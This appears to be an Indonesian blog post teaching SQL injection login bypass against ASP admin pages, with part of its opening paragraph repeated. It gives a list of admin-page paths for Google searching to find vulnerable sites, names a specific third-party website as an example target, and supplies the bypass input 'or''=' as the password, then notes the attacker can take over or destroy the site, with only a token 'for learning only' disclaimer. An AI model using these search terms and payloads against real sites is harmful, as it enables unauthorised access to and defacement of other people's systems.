Yang di maksud denngan SQL Injection ialah memasukkan kode² SQL untuk mendapatkan acces kedatabase yang lebih besar daripada yang seharusna kita dapatkan, terutama pada script yang tidak
memvalidasi input dari user.
Sebenarnya ini bug sudah lama sekali,tapi yang namanya ilmu gak ada basinya kan… :)
gak usah banyak omong langsung aja kepermasalahan.
memvalidasi input dari user.
Sebenarnya ini bug sudah lama sekali,tapi yang namanya ilmu gak ada basinya kan… :)
gak usah banyak omong langsung aja kepermasalahan.
pastikan komputer anda sudah connect internet hehehhee….
buka www.google.com
Masukkan kata kunci/keyword dibawah:
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
“/admin/adminlogin.asp”
“/admin/adminlogon.asp”
“/admin/admin_login.asp”
“/admin/admin_logon.asp”
“/administrator/admin.asp”
“/administrator/login.asp”
“/administrator/logon.asp”
“root/login.asp”
“admin/index.asp”
Nah disini saya mengambil contoh keyword ini: “/AdminLogin.asp” Dan hasil dari pencarian di google kita coba salah satu target. miasl:http://www.amskrupajal.org/AdminLogin.asp disitu ada menu seperti ini:
BOARD ADMINISTRATOR
Screenshoot :
Silakan login terlebih dahulu untuk melakukan perubahan pada Message Board Anda
LOGIN NAME : admin
PASSWORD : 'or''='
setelah Login yang dapat kita lakukan adalah :
:: Normal view
:: Administrator View
:: Kustomisasi Tampilan
:: Preference
:: Ganti Password
:: Ubah Profil
:: Logout
ADMINISTRASI MESSAGE BOARD
Fasilitas ini dapat digunakan untuk melakukan adminsitrasi message board Anda. Anda dapat
melakukan apa saja yang Anda Inginkan termasuk Menghancurkan WEB tersebut.
Mohon jangan disalahgunakan karena ini hanya pembelajaran saja. .
BY : SEMUT MERAH
0 komentar